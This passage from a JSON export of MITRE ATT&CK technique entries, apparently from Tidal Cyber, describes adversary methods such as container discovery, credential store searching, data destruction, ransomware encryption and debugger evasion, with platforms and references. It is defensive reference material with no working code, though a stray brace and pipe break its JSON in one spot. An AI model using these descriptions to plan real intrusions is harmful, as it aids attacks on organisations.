"description": "Adversaries may attempt to discover containers and other resources that are available within a container environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.<sup>[[Docker API](https://app.tidalcyber.com/references/b8ec1e37-7286-40e8-9577-ff9c54801086)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup> In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. ",
"meta": {
"platforms": [
"Containers"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "41c4b4cc-99da-4323-b0f4-229906578501",
"value": "Container and Resource Discovery"
},
{
"description": "Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5) followed by [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) and other data to already compromised systems.<sup>[[ESET MoustachedBouncer](https://app.tidalcyber.com/references/6c85e925-d42b-590c-a424-14ebb49812bb)]</sup>\n\nAdversaries may inject content into victim systems in various ways, including:\n\n* From the middle, where the adversary is in-between legitimate online client-server communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9), which describes AiTM activity solely within an enterprise environment) <sup>[[Kaspersky Encyclopedia MiTM](https://app.tidalcyber.com/references/353a6eb9-54c5-5211-ad87-abf5d941e503)]</sup>\n* From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server <sup>[[Kaspersky ManOnTheSide](https://app.tidalcyber.com/references/8ea545ac-cca6-5da5-8a93-6b07518fc9d4)]</sup>\n\nContent injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with \"lawful interception.\"<sup>[[Kaspersky ManOnTheSide](https://app.tidalcyber.com/references/8ea545ac-cca6-5da5-8a93-6b07518fc9d4)]</sup><sup>[[ESET MoustachedBouncer](https://app.tidalcyber.com/references/6c85e925-d42b-590c-a424-14ebb49812bb)]</sup><sup>[[EFF China GitHub Attack](https://app.tidalcyber.com/references/b8405628-6366-5cc9-a9af-b97d5c9176dd)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
},
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "3f95e4f2-cd4a-502c-a12a-becb8d28440c",
"value": "Content Injection"
},
{
"description": "Adversaries may create an account to maintain access to victim systems.<sup>[[Symantec WastedLocker June 2020](https://app.tidalcyber.com/references/061d8f74-a202-4089-acae-687e4f96933b)]</sup> With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.\n\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "55bcf759-a0bf-47e9-99f8-4e8ca997e6ce",
"value": "Create Account"
},
{
"description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.<sup>[[TechNet Services](https://app.tidalcyber.com/references/b50a3c2e-e997-4af5-8be0-3a8b3a959827)]</sup> On macOS, launchd processes known as [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) and [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00) are run to finish system initialization and load user specific parameters.<sup>[[AppleDocs Launch Agent Daemons](https://app.tidalcyber.com/references/310d18f8-6f9a-48b7-af12-6b921209d1ab)]</sup> \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.<sup>[[OSX Malware Detection](https://app.tidalcyber.com/references/0df0e28a-3c0b-4418-9f5a-77fffe37ac8a)]</sup> ",
"meta": {
"platforms": [
"Containers",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "f8aa018b-5134-4201-87f2-e55d20f40b17",
"value": "Create or Modify System Process"
},
{
"description": "Adversaries may search for common password storage locations to obtain user credentials.<sup>[[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]</sup> Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "a0bb264e-8617-4ae6-bafd-f52b36c63d12",
"value": "Credentials from Password Stores"
},
{
"description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://app.tidalcyber.com/technique/761fa7fa-d7e1-4796-85b3-5cd37d55dffa) and [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make them irrecoverable.<sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup> In some cases politically oriented image files have been used to overwrite data.<sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup>\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup>.\n\nIn cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.<sup>[[Data Destruction - Threat Post](https://app.tidalcyber.com/references/97d16d3a-98a0-4a7d-9f74-8877c8088ddf)]</sup><sup>[[DOJ - Cisco Insider](https://app.tidalcyber.com/references/b8d9006d-7466-49cf-a70e-384edee530ce)]</sup>",
"meta": {
"platforms": [
"Containers",
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "e5016c2b-85fe-4e6b-917d-0dd5b441cc34",
"value": "Data Destruction"
},
{
"description": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.<sup>[[Wikipedia Binary-to-text Encoding](https://app.tidalcyber.com/references/9b3820e8-f094-4e87-9ed6-ab0207d509fb)]</sup> <sup>[[Wikipedia Character Encoding](https://app.tidalcyber.com/references/3e7df20f-5d11-4102-851f-04e89c25d12f)]</sup> Some data encoding systems may also result in data compression, such as gzip.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "7d8af4f3-7d8e-4ef2-b828-40a910fc6188",
"value": "Data Encoding"
},
{
"description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.<sup>[[US-CERT Ransomware 2016](https://app.tidalcyber.com/references/866484fa-836d-4c5b-bbad-3594ef60599c)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup><sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup><sup>[[US-CERT SamSam 2018](https://app.tidalcyber.com/references/b9d14fea-2330-4eed-892c-b4e05a35d273)]</sup>\n\nIn the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://app.tidalcyber.com/technique/cb2e4822-2529-4216-b5b8-75158c5f85ff) or [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418), in order to unlock and/or gain access to manipulate these files.<sup>[[CarbonBlack Conti July 2020](https://app.tidalcyber.com/references/3c3a6dc0-66f2-492e-8c9c-c0bcca73008e)]</sup> In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.<sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup> \n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).<sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup><sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup> Encryption malware may also leverage [Internal Defacement](https://app.tidalcyber.com/technique/546a3318-0e03-4b22-95f5-c02ff69a4ebf), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as \"print bombing\").<sup>[[NHS Digital Egregor Nov 2020](https://app.tidalcyber.com/references/92f74037-2a20-4667-820d-2ccc0e4dbd3d)]</sup>\n\nIn cloud environments, storage objects within compromised accounts may also be encrypted.<sup>[[Rhino S3 Ransomware Part 1](https://app.tidalcyber.com/references/bb28711f-186d-4101-b153-6340ce826343)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "f0c36d24-263c-4811-8784-f716c77ec6b3",
"value": "Data Encrypted for Impact"
},
{
"description": "Adversaries may access data from cloud storage.\n\nMany IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. \n\nIn some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) through which to interact with the stored objects: instead, data from these solutions is retrieved directly through the [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://app.tidalcyber.com/technique/08a73f37-a04e-46be-9409-b330cbe291b4)). \n\nAdversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.<sup>[[Amazon S3 Security, 2019](https://app.tidalcyber.com/references/4c434ca5-2544-45e0-82d9-71343d8aa960)]</sup><sup>[[Microsoft Azure Storage Security, 2019](https://app.tidalcyber.com/references/95bda448-bb13-4fa6-b663-e48a9d1b866f)]</sup><sup>[[Google Cloud Storage Best Practices, 2019](https://app.tidalcyber.com/references/752ad355-0f10-4c8d-bad8-42bf2fc75fa0)]</sup> There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.\n\nThis open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.<sup>[[Trend Micro S3 Exposed PII, 2017](https://app.tidalcyber.com/references/1ba37b48-1219-4f87-af36-9bdd8d6265ca)]</sup><sup>[[Wired Magecart S3 Buckets, 2019](https://app.tidalcyber.com/references/47fb06ed-b4ce-454c-9bbe-21b28309f351)]</sup><sup>[[HIPAA Journal S3 Breach, 2017](https://app.tidalcyber.com/references/b0fbf593-4aeb-4167-814b-ed3d4479ded0)]</sup><sup>[[Rclone-mega-extortion_05_2021](https://app.tidalcyber.com/references/9b492a2f-1326-4733-9c0e-a9454bf7fabb)]</sup>\n\nAdversaries may also obtain and then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.",
"meta": {
"platforms": [
"Google Workspace",
"IaaS",
"Office 365",
"SaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "77069b3f-9e42-4f1b-894f-8df568233df2",
"value": "Data from Cloud Storage"
},
{
"description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[US-CERT TA17-156A SNMP Abuse 2017](https://app.tidalcyber.com/references/82b814f3-2853-48a9-93ff-701d16d97535)]</sup>",
"meta": {
"platforms": [
"Network"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "97ef6135-47d4-4b91-8783-c0b5f331340e",
"value": "Data from Configuration Repository"
},
{
"description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. \n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://app.tidalcyber.com/technique/8ac6952d-5add-4cbc-ad39-44943ed3459b) and [Confluence](https://app.tidalcyber.com/technique/3cc64d61-7922-4e08-98ff-b76cb2173830), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.",
"meta": {
"platforms": [
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "08a73f37-a04e-46be-9409-b330cbe291b4",
"value": "Data from Information Repositories"
},
{
"description": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), such as [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) as well as a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907), which have functionality to interact with the file system to gather information.<sup>[[show_run_config_cmd_cisco](https://app.tidalcyber.com/references/5a68a45a-a53e-5d73-a82a-0cc951071aef)]</sup> Adversaries may also use [Automated Collection](https://app.tidalcyber.com/technique/107ad6c5-79b1-468c-9519-1578bee2ac49) on the local system.\n",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "c0e4f97b-f651-493f-9636-6ac2f6fb46fb",
"value": "Data from Local System"
},
{
"description": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) may be used to gather information.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "875c5aa3-6ab1-4717-9503-9818ccbad98a",
"value": "Data from Network Shared Drive"
},
{
"description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://app.tidalcyber.com/technique/107ad6c5-79b1-468c-9519-1578bee2ac49) on removable media.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "ae3f9f0f-af66-424c-bcc8-4fdbd7ef9766",
"value": "Data from Removable Media"
},
{
"description": "Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.<sup>[[Sygnia Elephant Beetle Jan 2022](https://app.tidalcyber.com/references/932897a6-0fa4-5be3-bf0b-20d6ddad238e)]</sup> By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "b77f03e8-f7d0-4d0f-8b79-4642d0fe2709",
"value": "Data Manipulation"
},
{
"description": "Adversaries may obfuscate command and control traffic to make it more difficult to detect.<sup>[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]</sup> Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "57f95410-5735-43ae-9fec-8b628a7df985",
"value": "Data Obfuscation"
},
{
"description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://app.tidalcyber.com/technique/ebd3f870-c513-4fb0-b133-15ffc1f91db2). Interactive command shells may be used, and common functionality within [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) and bash may be used to copy data into a staging location.<sup>[[PWC Cloud Hopper April 2017](https://app.tidalcyber.com/references/fe741064-8cd7-428b-bdb9-9f2ab7e92489)]</sup>\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and stage data in that instance.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "ef4ef020-5cd1-4859-902b-f207828a1281",
"value": "Data Staged"
},
{
{
|
||
"description": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "dc98c882-8fba-4a10-bc6f-43088edb87af",
"value": "Data Transfer Size Limits"
},
{
"description": "Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.<sup>[[ProcessHacker Github](https://app.tidalcyber.com/references/3fc82a92-cfba-405d-b30e-22eba69ab1ee)]</sup>\n\nDebugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.\n\nSpecific checks will vary based on the target and/or adversary, but may involve [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function calls such as <code>IsDebuggerPresent()</code> and <code>NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).<sup>[[hasherezade debug](https://app.tidalcyber.com/references/53b0c71d-c577-40e8-8a04-9de083e276a2)]</sup><sup>[[AlKhaser Debug](https://app.tidalcyber.com/references/d9773aaf-e3ec-4ce3-b5c8-1ca3c4751622)]</sup><sup>[[vxunderground debug](https://app.tidalcyber.com/references/8c7fe2a2-64a1-4680-a4e6-f6eefe00407a)]</sup>\n\nAdversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function calls such as <code>OutputDebugStringW()</code>.<sup>[[wardle evilquest partii](https://app.tidalcyber.com/references/4fee237c-c2ec-47f5-b382-ec6bd4779281)]</sup><sup>[[Checkpoint Dridex Jan 2021](https://app.tidalcyber.com/references/a988084f-1a58-4e5b-a616-ed31d311cccf)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "945c1564-6c13-4baa-b1d4-6ba82e06a897",
"value": "Debugger Evasion"
},
{
"description": "Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b) in order to cause user discomfort, or to pressure compliance with accompanying messages. \n",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "9a21c7c7-cf8e-4f05-b196-86ec39653e3b",
"value": "Defacement"
},
{
"description": "Adversaries may use [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) to decode a remote access tool portable executable file that has been hidden inside a certificate file.<sup>[[Malwarebytes Targeted Attack against Saudi Arabia](https://app.tidalcyber.com/references/735647f9-9cd4-4a20-8812-4671a3358e46)]</sup> Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload.<sup>[[Carbon Black Obfuscation Sept 2016](https://app.tidalcyber.com/references/bed8ae68-9738-46fb-abc9-0004fa35636a)]</sup>\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. <sup>[[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "88c2fb46-877a-4005-8425-7639d0da1920",
"value": "Deobfuscate/Decode Files or Information"
},
{
